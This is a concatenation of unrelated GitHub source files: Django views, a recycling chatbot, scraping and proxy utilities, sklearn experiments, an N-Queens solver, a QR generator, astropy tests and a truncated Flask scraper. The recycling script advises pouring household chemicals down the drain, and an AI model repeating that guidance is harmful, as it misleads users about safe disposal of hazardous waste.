doc_name\n","repo_name":"himanshu-kashware/ocr_reader","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39876369320","text":"from django.shortcuts import render, redirect\nfrom coursework.models import Cars\nfrom coursework.forms import CarsForm\n\n\ndef index(request):\n return render(request, 'index.html', {'title': 'Головна сторінка', 'page': 'index'})\n\n\ndef cars(request):\n return render(request, 'cars.html', {'title': 'Перелік', 'page': 'cars', 'cars': Cars.objects.all()})\n\n\ndef add(request):\n if request.method == \"POST\":\n form = CarsForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/cars')\n else:\n form = CarsForm()\n return render(request, 'add.html', {'title': 'Додати авто', 'page': 'cars', 'form': form})\n\n\ndef edit(request, car_id):\n car = Cars.objects.get(id=car_id)\n if request.method == \"POST\":\n form = CarsForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect(\"/cars\")\n form = CarsForm(instance=car)\n return render(request, 'edit.html', {'title': 'Редагувати авто', 'page': 'cars', 'car': form})\n\n\ndef update(request, car_id):\n car = Cars.objects.get(id=car_id)\n form = CarsForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect(\"/cars\")\n return render(request, 'edit.html', {'car': car})\n\n\ndef destroy(request, car_id):\n car = Cars.objects.get(id=car_id)\n car.delete()\n return redirect(\"/cars\")\n","repo_name":"kosariev/cs22m-python","sub_path":"coursework/coursework/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37695930638","text":"from random import randint\nimport string\nimport time\n\ndef remove_punctuation(x):\n table = str.maketrans({key: None for key in string.punctuation})\n return x.translate(table)\n\n#Greeting\ngreetings = [\"Hello!\", \"Hey!\", \"Hey there!\", \"Hi!\", \"Hi, how you doing?\"]\nprint(greetings[randint(0, len(greetings)-1)])\n\nanswer_processed = \" yes \"\n\nwhile answer_processed.lower().find(\" yes \") > -1 or answer_processed.lower().find(\" y \") > -1 or answer_processed.lower().find(\" yeah \") > -1:\n\n #Ensure what they are asking for is included.\n contains = False\n reply = input(\"What would you like to recycle today?\")\n while contains == False:\n reply_processed = \" \" + remove_punctuation(reply).lower() + \" \"\n recyclables = [\"battery\", \"batteries\", \"computer\", \"phone\", \"laptop\", \"desktop\", \"cellphone\", \"electronic\", \"electronics\", \"aluminum\", \"can\", \"cans\", \"soda\", \"pop\", \"toilet bowl cleaner\", \"shower cleaner\", \"tile cleaner\", \"carpet cleaner\", \"rust remover\", \"pesticides\", \"herbicides\", \"fertilizer\", \"insecticides\", \"insecticide\", \"fertilizers\", \"herbicide\", \"pesticide\"]\n #batteries = 0, 2\n #electronic = 2 - 9\n #aluminum cans = 9 - 14\n #household chemicals = 14 - 19\n #garden chemicals = 19 - 27\n recyclables_processed = \" \"\n\n for a in range(0, len(recyclables)-1):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n\n if contains == False:\n print(\"Sorry, we don't have info on how to recycle that.\")\n time.sleep(1)\n reply = input(\"What else would you like to recycle 
today?\").lower()\n\n #Batteries\n\n contains = False\n for a in range(0,2):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n second_reply = input(\"What brand is your battery?\").lower()\n contains = False\n battery_brands = [\"duracell\",\"energizer\",\"rayovac\",\"panasonic\"]\n if second_reply in battery_brands:\n print(\"That's an alkaline battery. All alkaline batteries can be thrown away normally unless they are rechargable.\")\n else:\n print(\"You can drop your battery off at a local Household Hazardous Waste/E-Waste Collection Center.\")\n time.sleep(2)\n print(\"Go to www.call2recycle.org to find a location near you.\")\n time.sleep(1)\n\n #Electronics\n\n electronics = [\"computer\", \"phone\", \"laptop\", \"desktop\", \"cellphone\", \"device\", \"electronic\"]\n\n contains = False\n for a in range(2,9):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"All old electronics can be disposed of at your local recycler.\")\n time.sleep(3)\n print(\"Many non-profit organizations can recycle them too.\")\n time.sleep(3)\n print(\"Call2Recycle also has drop-off locations for cell phones throughout the USA.\")\n time.sleep(2)\n print(\"Go to www.call2recycle.org to find a location near you.\")\n time.sleep(1)\n\n #Aluminum Cans\n\n contains = False\n for a in range(9,14):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"Aluminum cans are infinitely recyclable! They can be back on shelves within 60 days of recycling.\")\n time.sleep(3)\n print(\"Use Earth911.com's Recycling Search to find the nearest drop-off center.\")\n time.sleep(2)\n print(\"Cans are also typically available for pickup alongside other recyclables and your local waste pick-up program. 
:)\")\n time.sleep(1)\n\n #Household chemicals\n\n contains = False\n for a in range(14,19):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"Dispose of household chemicals the same way they are used, such as down the drain.\")\n\n #Garden chemicals\n\n contains = False\n for a in range(19,27):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"You can drop off your garden chemicals at a local Household Hazardous Waste Center.\")\n\n answer = input(\"Would you like to recycle anything else?\")\n answer_processed = \" \" + remove_punctuation(answer) + \" \"\n","repo_name":"samantharivera0/Recycling-Resources-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42004783402","text":"import logging\nimport time\nimport urllib.request\nimport zlib\nimport pandas as pd\nfrom socket import timeout\n\nimport requests\nfrom bs4 import BeautifulSoup as bs, BeautifulSoup\n\nfrom constants import TEST_PING_URL, PROXY_LIST_LENGTH, TEST_PING_TIMEOUT, DRILL_TIMEOUT\nfrom logger import init_logger\n\n\ndef get_free_proxy_list():\n url = \"https://free-proxy-list.net/\"\n soup = bs(requests.get(url).content, \"html.parser\")\n proxies = []\n for row in soup.find(\"table\", attrs={\"class\": \"table table-striped table-bordered\"}).find_all(\"tr\")[1:]:\n tds = row.find_all(\"td\")\n try:\n ip = tds[0].text.strip()\n port = tds[1].text.strip()\n host = f\"{ip}:{port}\"\n proxies.append(host)\n except IndexError:\n continue\n return proxies\n\n\ndef prepare_proxy(proxy):\n proxy_header = {\n 'http': proxy,\n 'https': proxy,\n }\n proxy_support = urllib.request.ProxyHandler(proxy_header)\n authinfo = urllib.request.HTTPBasicAuthHandler()\n opener = urllib.request.build_opener(proxy_support, authinfo,\n urllib.request.CacheFTPHandler)\n urllib.request.install_opener(opener)\n\n\ndef get_proxy():\n proxy_list = get_free_proxy_list()\n good_proxy_list = []\n for i, proxy in enumerate(proxy_list):\n try:\n prepare_proxy(proxy)\n urllib.request.urlopen(url=TEST_PING_URL, timeout=TEST_PING_TIMEOUT)\n good_proxy_list.append(proxy)\n if len(good_proxy_list) == PROXY_LIST_LENGTH:\n break\n except:\n continue\n return good_proxy_list\n\n\ndef request_general(url, request_type='GET', headers=None, is_gzipped=False, name_tag=\"\", resp_form=False):\n if headers is None:\n headers = {}\n tic = time.perf_counter()\n try:\n request_message = urllib.request.Request(url=url, headers=headers, method=request_type)\n with urllib.request.urlopen(request_message, timeout=DRILL_TIMEOUT) as response_message:\n print(response_message.read())\n if is_gzipped:\n response_message = zlib.decompress(response_message.read(), zlib.MAX_WBITS | 16)\n if resp_form:\n return response_message\n soup = BeautifulSoup(response_message, features=\"html.parser\")\n except Exception as err:\n if type(err) == timeout:\n logging.error(f'{request_type} url timeout: [{name_tag}] {err}')\n else:\n logging.error(f'{request_type} url failed: [{name_tag}] {err}')\n return None\n toc = time.perf_counter()\n logging.debug(f'Request {request_type}... [url: {url}]. 
Time taken:\\t{toc - tic:0.4f}s')\n return soup\n\n\ndef not_startswith(url, exception_list):\n for excep in exception_list:\n if url.startswith(excep):\n return False\n return True\n\n\ndef request_dashboard(url, template, exceptions):\n r = requests.get(url)\n b = BeautifulSoup(r.content, \"html.parser\")\n links = [link.get('href') for link in b.findAll('a')]\n links = set(links)\n prep_links = [link for link in links if link.startswith(template) and not_startswith(link, exceptions)]\n return prep_links\n\n\ndef request_content(url, type_class):\n r = requests.get(url)\n b = BeautifulSoup(r.content, \"html.parser\")\n body = b.find(\"div\", {\"class\": type_class})\n return body.text if body is not None else None\n\n\ndef retrieving_nbc_news(category):\n nbc_url = 'https://www.nbcnews.com/' + category\n template_url = f'https://www.nbcnews.com/news/'\n exceptions_list = [template_url+'nbc-news-digital-editors']\n news_web_list = request_dashboard(nbc_url, template_url, exceptions_list)\n logging.info(f'Get {len(news_web_list)} news from {nbc_url}.')\n result = []\n\n for i in news_web_list:\n content = request_content(i, \"article-body__content\")\n if content is not None:\n result.append([i, category, content])\n time.sleep(0.33)\n\n return result\n\n\nif __name__ == '__main__':\n init_logger()\n result = retrieving_nbc_news('world')\n df = pd.DataFrame(result, columns=['url', 'category', 'content'])\n for i in df['content']:\n print(i)","repo_name":"mcgill-hermes/hermes-scraping","sub_path":"web_utils.py","file_name":"web_utils.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11231737622","text":"# iterator to obiekt ktory przegladania elementow kolekcji\n# listy, zbiory, slowniki, krotki sa iterowalne\n\nlista = [1, 3, 4]\n\niterator_listowy = iter(lista)\nprint(iterator_listowy)\nprint(next(iterator_listowy))\nprint(next(iterator_listowy))\nprint(next(iterator_listowy))\n# print(next(iterator_listowy))\n\n# iter inicjuje iteracje\n# next zwraca wartosc danego elementu i przechodzi do nastepnego\n# zwraca wyjatek gdy dojdzie do konca\n\n\nclass MojIterator:\n def __init__(self, maks=10):\n self.x = 1\n self.max = maks\n\n def __iter__(self):\n return self\n\n def __next__(self):\n x = self.x\n\n if x > self.max:\n raise StopIteration\n\n self.x += 5\n return x\n\n\nfor i in MojIterator(40):\n print(i)\n\n\nclass Odwroc:\n def __init__(self, dane=\"Napis\"):\n self.dane = dane\n self.indeks = len(dane)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.indeks == 0:\n raise StopIteration\n\n self.indeks -= 1\n return self.dane[self.indeks]\n\n\nfor i in Odwroc():\n print(i, end=\"\")\n\nprint(\"\")\n\nfor i in Odwroc(\"tunczyk\"):\n print(i, end=\"\")\n\nprint(\"\")\n\nfor i in Odwroc((3, 2, \"e\", 10)):\n print(i, end=\"\")\n","repo_name":"Strangerinc/Kurs-Podstaw-Pythona","sub_path":"Python-dla-sredniozaawansowanych/Iteratory.py","file_name":"Iteratory.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770893914","text":"\"\"\" A prefeitura de uma cidade fez uma pesquisa entre seus habitantes,\ncoletando dados sobre o salário e número de filhos. A prefeitura deseja saber: \n\n a) média do salário da população; \n b) média do número de filhos; \n c) maior salário; \n d) percentual de pessoas com salário até R$100,00. 
\n\nO final da leitura de dados se dará com a entrada de um salário negativo. (Use o comando WHILE) \"\"\"\n\ncontador = 1\ntotSalario=totalFilhos = media_salario = mediaFilhos =contador_menos_de_cem= salario_menos_de_cem= 0\nwhile True:\n salario = float(input('Salario: '))\n if salario > 0:\n numFilhos = int(input('Filhos: '))\n totSalario += salario\n totalFilhos += numFilhos\n if salario <= 100:\n contador_menos_de_cem +=1\n else:\n break\n maior_salario = 0\n\n if salario > maior_salario:\n maior_salario = salario\n\n contador += 1\n\nmedia_salario = totSalario / (contador - 1)\nmediaFilhos = totalFilhos /(contador - 1) \n\nsalario_menos_de_cem = contador_menos_de_cem*100 / (contador - 1)\n \nprint(f'A media salarial da população é de:R${media_salario}.' )\nprint(f'A media de filhos da população é de:{mediaFilhos}.' )\nprint(f'maior salario foi de : R${maior_salario}')\nprint(f'percentual de pessoas com salario menor que R$100,00 é de {salario_menos_de_cem}')\nprint(f'um total de {contador-1} habitantes foram ouvidos')","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 3/exc3.py","file_name":"exc3.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9160841213","text":"\"\"\"\nExample on how to modify the parameters (definition) of a DoE\nThis example will be moved to the documentation\n\"\"\"\n\nfrom f3dasm.doe.doevars import DoeVars\n\n# -------------------------------------------\n# Create DoE with original parameters\n# -------------------------------------------\nvars = {\n 'F11':[-0.15, 1], \n 'F12':[-0.1,0.15],\n 'F22':[-0.15, 1], \n 'radius': [0.3, 5], \n 'material1': {'STEEL': {'E': [0,100], 'u': {0.1, 0.2, 0.3} }, \n 'CARBON': {'E': 5, 'u': 0.5, 's': 0.1 } },\n 'material2': { 'CARBON': {'x': 2} },\n }\n\n\ndoe = DoeVars(vars)\nprint(doe.info())\n\n# -------------------------------------------\n# Modifying DoE parameters\n# -------------------------------------------\n\n# You can modify each parameter by calling the 'variables' attribute \n# and the name of the parameter, and assing a new value , \n# in the same way dictionaries can be modified\n\n# Modify existing parameter\ndoe.variables['radius'] = 1.0\nprint('Modified radius:')\nprint(doe.info())\n\n# Adding parameters\ndoe.variables['F13']= [-.1, 0.8]\nprint('New parameter F13')\nprint(doe.info())\n","repo_name":"ykato18/Supercompressible_data","sub_path":"F3DASM-development/examples/ex_modifying_a_doe.py","file_name":"ex_modifying_a_doe.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70648186934","text":"import math\n\n#length = int(input())\n\ndef half(sV, reverse = True):\n x = 1 if reverse else -1\n sV2 = sV*int(reverse)\n for i in range(sV+1):\n print(\"*\", end=\"\")\n for j in range(sV2):\n print(end=\" \")\n sV2 -= x\n print(\"*\")\n \nspaceValue = math.ceil(int(input())/2)-1\nhalf(spaceValue)\nhalf(spaceValue, False)\n \nend = input()\n","repo_name":"aordatus/python-practice","sub_path":"[Day#1] Pattern K for even rows.py","file_name":"[Day#1] Pattern K for even rows.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13040146526","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport tensorflow as tf\nphysical_devices = tf.config.list_physical_devices('GPU')\ntry:\n 
tf.config.experimental.set_memory_growth(physical_devices[0], True)\nexcept:\n print(\"No device\")\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(train_images, y_train), (test_images, y_test) = \\\n fashion_mnist.load_data()\n# %%\n\"\"\"\nAnalyze MNIST dataset\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\n# number of digits to plot\nn_immagini = 10\n\n# Init plot\nwindow, ax = plt.subplots(\n 1, # n rows\n n_immagini, # n col\n figsize=(10, 10) # window size\n)\n\n# plot hand written digits\nfor i in range(n_immagini):\n ax[i].axis('off') # toogle axis to each subplot\n ax[i].imshow( # plot image\n train_images[i], # input image\n cmap=plt.cm.binary # color map\n )\n\n\nplt.figtext(\n .45,\n .30,\n y_train[0:n_immagini],\n style='italic',\n bbox={'facecolor': 'yellow'},\n fontsize='xx-large',\n fontweight='bold',\n)\n\n\n\"\"\"\nRescale dataset to range(0,1)\n\"\"\"\ntrain_images = train_images.reshape((60000, 28*28))\nx_train = train_images.astype('float32') / 255\n\ntest_images = test_images.reshape((10000, 28*28))\nx_test = test_images.astype('float32') / 255\n# %%\nfrom sklearn.tree import DecisionTreeClassifier\ndec_tree_clf = DecisionTreeClassifier(max_depth=50, random_state=42)\ndec_tree_clf.fit(x_train, y_train)\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score, recall_score\nfrom sklearn.metrics import f1_score\n\ny_train_predict = dec_tree_clf.predict(x_train)\ndec_tree_accuracy = accuracy_score(y_train, y_train_predict)\ndec_tree_precision = precision_score(y_train, y_train_predict, average='weighted')\ndec_tree_recall = recall_score(y_train, y_train_predict, average='weighted')\ndec_tree_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"Decision Tree Accuracy: \", dec_tree_accuracy)\nprint(\"Decision Tree Precision: \", dec_tree_precision)\nprint(\"Decision Tree Recall: \", dec_tree_precision)\nprint(\"Decision Tree F1 Score: \", dec_tree_f1_score)\n\n################\n\nfrom sklearn.linear_model import SGDClassifier\nsgd_clf = SGDClassifier(random_state=42)\nsgd_clf.fit(x_train, y_train)\n\ny_train_predict = sgd_clf.predict(x_train)\nsgd_accuracy = accuracy_score(y_train, y_train_predict)\nsgd_precision = precision_score(y_train, y_train_predict, average='weighted')\nsgd_recall = recall_score(y_train, y_train_predict, average='weighted')\nsgd_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"SGD Accuracy: \", sgd_accuracy)\nprint(\"SGD Precision: \", sgd_precision)\nprint(\"SGD Recall: \", sgd_precision)\nprint(\"SGD F1 Score: \", sgd_f1_score)\n\n#################\n\nfrom sklearn.ensemble import RandomForestClassifier\nrnd_clf = RandomForestClassifier(n_estimators=100, max_depth=50, random_state=42)\nrnd_clf.fit(x_train, y_train)\ny_train_predict = rnd_clf.predict(x_train)\nrnd_accuracy = accuracy_score(y_train, y_train_predict)\nrnd_precision = precision_score(y_train, y_train_predict, average='weighted')\nrnd_recall = recall_score(y_train, y_train_predict, average='weighted')\nrnd_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"Random Forest Accuracy: \", rnd_accuracy)\nprint(\"Random Forest Precision: \", rnd_precision)\nprint(\"Random Forest Recall: \", rnd_precision)\nprint(\"Random Forest F1 Score: \", 
rnd_f1_score)","repo_name":"AI2Life/AI-course-material","sub_path":"networks/fun_with_fashion_and_ml.py","file_name":"fun_with_fashion_and_ml.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4618542184","text":"# Constrained N-Queens Solver\r\n# Reads input file input.csv which contains a square table with the location of one queen\r\n# Returns a table with N number of un-threatened queens or prints \"no solution\"\r\n# where N is the number of rows in the original table\r\n\r\n# Load input data\r\ninputData = open(\"input.csv\", \"rt\")\r\n\r\n# Goal number of queens and board dimensions\r\nN = 0\r\n# Stacks of queen positions (to find most recently added queens)\r\nstackSize = 0\r\nqueenRows = []\r\nqueenColumns = []\r\n# Arrays of queen positions (to find queen positions quickly)\r\nfullRows = []\r\nfullCols = []\r\n\r\n# Find N and first queen\r\nrow = 0\r\ncolumn = 0\r\nfor line in inputData:\r\n for x in line:\r\n if x == ',':\r\n column += 1\r\n elif x == '1':\r\n queenRows.append(row)\r\n queenColumns.append(column)\r\n stackSize += 1\r\n N += 1\r\n row += 1\r\n column = 0\r\n\r\n# Close input file\r\ninputData.close()\r\n\r\n# Fill queen arrays\r\nfor x in range(N):\r\n fullRows.append(-1)\r\n fullCols.append(-1)\r\nfullRows[queenRows[0]] = queenColumns[0]\r\nfullCols[queenColumns[0]] = queenRows[0]\r\n\r\n# Define diagonal checker function\r\n# Returns 1 if a collision is found, 0 otherwise\r\ndef checkDiagonalCollision():\r\n # Check down-right diagonal\r\n R = row + 1\r\n C = column + 1\r\n while R < N and C < N:\r\n if fullRows[R] == C:\r\n return 1\r\n R += 1\r\n C += 1\r\n # Check down-left diagonal\r\n R = row + 1\r\n C = column - 1\r\n while R < N and C > -1:\r\n if fullRows[R] == C:\r\n return 1\r\n R += 1\r\n C -= 1\r\n # Check up-right diagonal\r\n R = row - 1\r\n C = column + 1\r\n while R > -1 and C < N:\r\n if fullRows[R] == C:\r\n return 1\r\n R -= 1\r\n C += 1\r\n # Check up-left diagonal\r\n R = row - 1\r\n C = column - 1\r\n while R > -1 and C > -1:\r\n if fullRows[R] == C:\r\n return 1\r\n R -= 1\r\n C -= 1\r\n # All diagonals clear\r\n return 0\r\n\r\n\r\n# Main backtracking loop\r\n# Loop through each empty row\r\nrow = 0\r\ncolumn = 0\r\nwhile row < N:\r\n # If row is unoccupied, proceed\r\n if fullRows[row] == -1:\r\n # Loop through each empty position in this row\r\n while column < N:\r\n # If position is unoccupied, proceed\r\n if fullCols[column] == -1:\r\n # Check diagonals\r\n if checkDiagonalCollision() == 0:\r\n # Valid queen position found, record position and push onto stacks\r\n fullRows[row] = column\r\n fullCols[column] = row\r\n queenRows.append(row)\r\n queenColumns.append(column)\r\n stackSize += 1\r\n break\r\n # No valid position in row\r\n if column == (N - 1):\r\n while column == (N - 1):\r\n # No queens removable from the stack\r\n if stackSize == 1:\r\n print(\"No solution\")\r\n exit(0)\r\n # Pop previous queen off the stack and return to that position\r\n row = queenRows.pop()\r\n column = queenColumns.pop()\r\n stackSize -= 1\r\n fullRows[row] = -1\r\n fullCols[column] = -1\r\n # If previous queen was at the end of its row, repeat\r\n column += 1\r\n row += 1\r\n column = 0\r\n\r\n# Print out solution\r\noutputData = open(\"solution.csv\", \"w\")\r\nrow = 0\r\nfor row in range(N):\r\n for column in range(N):\r\n if fullRows[row] == column:\r\n outputData.write(\"1\")\r\n else:\r\n outputData.write(\"0\")\r\n if column < (N - 
1):\r\n outputData.write(\",\")\r\n outputData.write(\"\\n\")\r\n\r\n# Close the output file\r\noutputData.close()\r\n","repo_name":"RheaHuber/AI-NQueens","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"955534039","text":"import unittest\nimport math\nfrom pagerank import *\n\n\nclass TransitionModelTestCase(unittest.TestCase):\n def setUp(self):\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.prob_dist = transition_model(self.corpus, \"1.html\", DAMPING)\n\n def test_no_link_page(self):\n corpus = self.corpus\n # Set 1.html to no links\n corpus[\"1.html\"] = {}\n prob_dist = transition_model(corpus, \"1.html\", DAMPING)\n # Each probability should be 0.333 as only 3 pages\n for prob in prob_dist.values():\n self.assertTrue(math.isclose(prob, 1/3))\n\n def test_link_page(self):\n \"\"\" There may be a rounding error due to floats not being exact. \"\"\"\n\n # Each probability should be 0.333 as only 3 pages\n self.assertEqual(\n self.prob_dist, {\"1.html\": 0.05, \"2.html\": 0.475, \"3.html\": 0.475})\n\n def test_prob_dist_sum_to_one(self):\n self.assertTrue(sum(self.prob_dist.values()) == 1)\n\n\nclass SamplePagerankTestCase(unittest.TestCase):\n def setUp(self):\n # So all test outputs are the same use same random numbers\n random.seed(0)\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.pagerank = sample_pagerank(self.corpus, DAMPING, 100000)\n\n def test_pagerank_sums_to_one(self):\n self.assertTrue(sum(self.pagerank.values()) == 1)\n\n def test_pagerank(self):\n \"\"\" This is the test being done: but adding maths.isclose for rounding errors:\n self.assertEqual(\n self.pagerank, {'1.html': 0.05011, '2.html': 0.47548, '3.html': 0.47441}) \"\"\"\n pages = ['1.html', '2.html', '3.html']\n keys = list(self.pagerank.keys())\n for i in range(len(keys)):\n page = keys[i]\n example_page = pages[i]\n self.assertEqual(page, example_page)\n\n example_values = [0.05011, 0.47548, 0.47441]\n values = list(self.pagerank.values())\n for i in range(len(values)):\n value = values[i]\n example_value = example_values[i]\n self.assertTrue(math.isclose(value, example_value))\n\n\nclass IteratePagerankTestCase(unittest.TestCase):\n def setUp(self):\n # So all test outputs are the same use same random numbers\n random.seed(0)\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.pagerank = iterate_pagerank(self.corpus, DAMPING)\n\n def test_pagerank(self):\n # print(\"final pagerank\", self.pagerank)\n self.assertEqual({'1.html': 0.05, '2.html': 0.475,\n '3.html': 0.475}, self.pagerank)\n\n def test_pagerank_sums_to_one(self):\n self.assertTrue(sum(self.pagerank.values()) == 1)\n\n\n@unittest.skip(\"Skipped optional test for a function that returns all pages that have a link to a current page, can modify if have similar function\")\nclass GetPagesThatLinkTestCase(unittest.TestCase):\n def setUp(self):\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n\n def test_get_pages_that_link_with_no_links(self):\n links = get_pages_that_link(self.corpus, \"1.html\")\n # print(\"1.html links:\", links)\n self.assertEqual(set(), links)\n\n def test_get_pages_that_link_with_links(self):\n 
links = get_pages_that_link(self.corpus, \"2.html\")\n self.assertEqual({('3.html', 1), ('1.html', 2)}, links)\n # print(\"2.html links:\", links)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ArthurAllilaire/CS50-Intro-to-AI","sub_path":"Project-2/pagerank/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27877656687","text":"import qrcode\n\n\ncontent = str(input('QR code content: '))\ncode_color_R = int(input('Code color - R: '))\ncode_color_G = int(input('Code color - G: '))\ncode_color_B = int(input('Code color - B: '))\nbackground_color_R = int(input('Background color - R: '))\nbackground_color_G = int(input('Background color - G: '))\nbackground_color_B = int(input('Background color - B: '))\nfile_name = str(input('Write the file name: '))\n\n\nqr_obj = qrcode.QRCode(version = None,\n error_correction = qrcode.constants.ERROR_CORRECT_H)\n\nqr_obj.add_data(content)\nqr_obj.make(fit = True)\n\nqr_img = qr_obj.make_image(fill_color = (code_color_R, code_color_G, code_color_B),\n back_color = (background_color_R, background_color_G, background_color_B))\n\nqr_img.save(f'{file_name}.png')\n","repo_name":"matheussbchaves/qr_code","sub_path":"scripts/qr_code_generator.py","file_name":"qr_code_generator.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18590011961","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\nfrom numpy.testing import assert_allclose\n\nfrom astropy.utils.compat.optional_deps import HAS_PLT, HAS_SCIPY\n\nif HAS_PLT:\n import matplotlib.pyplot as plt\n\nimport numpy as np\nimport pytest\n\nfrom astropy.stats import histogram\nfrom astropy.visualization import hist\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_basic(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n for range in [None, (-2, 2)]:\n n1, bins1, patches1 = plt.hist(x, 10, range=range)\n n2, bins2, patches2 = hist(x, 10, range=range)\n\n assert_allclose(n1, n2)\n assert_allclose(bins1, bins2)\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_specify_ax(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n fig, ax = plt.subplots(2)\n n1, bins1, patches1 = hist(x, 10, ax=ax[0])\n assert patches1[0].axes is ax[0]\n\n n2, bins2, patches2 = hist(x, 10, ax=ax[1])\n assert patches2[0].axes is ax[1]\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_autobin(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n # 'knuth' bintype depends on scipy that is optional dependency\n if HAS_SCIPY:\n bintypes = [10, np.arange(-3, 3, 10), \"knuth\", \"scott\", \"freedman\", \"blocks\"]\n else:\n bintypes = [10, np.arange(-3, 3, 10), \"scott\", \"freedman\", \"blocks\"]\n\n for bintype in bintypes:\n for range in [None, (-3, 3)]:\n n1, bins1 = histogram(x, bintype, range=range)\n n2, bins2, patches = hist(x, bintype, range=range)\n assert_allclose(n1, n2)\n assert_allclose(bins1, bins2)\n\n\ndef test_histogram_pathological_input():\n # Regression test for https://github.com/astropy/astropy/issues/7758\n\n # The key feature of the data below is that one of the points is very,\n # very different than the rest. 
That leads to a large number of bins.\n data = [\n 9.99999914e05,\n -8.31312483e-03,\n 6.52755852e-02,\n 1.43104653e-03,\n -2.26311017e-02,\n 2.82660007e-03,\n 1.80307521e-02,\n 9.26294279e-03,\n 5.06606026e-02,\n 2.05418011e-03,\n ]\n\n with pytest.raises(ValueError):\n hist(data, bins=\"freedman\", max_bins=10000)\n","repo_name":"astropy/astropy","sub_path":"astropy/visualization/tests/test_histogram.py","file_name":"test_histogram.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"4319317251","text":"# python flask rest api\n\nfrom flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\ndef json_from_html_using_bs4(base_url, params):\n page = requests.get(base_url, params=params)\n soup = bs(page.text, \"html.parser\")\n jokes = soup.find_all(\"div\", class_=\"q post\")\n\n res, joke_no = [], 1\n\n for joke in jokes:\n joke_id = joke.find(\"a\", class_=\"qid click\")[\"href\"].replace(\"/\", \"\")\n joke_date = joke.find(\"div\", class_=\"right\").text.strip()\n joke_content = joke.find(\n \"div\", class_=\"quote post-content post-body\"\n ).text.strip()\n\n data = {\n \"joke_id\": joke_id,\n \"joke_date\": joke_date,\n \"joke_content\": joke_content,\n }\n res.append(data)\n joke_no += 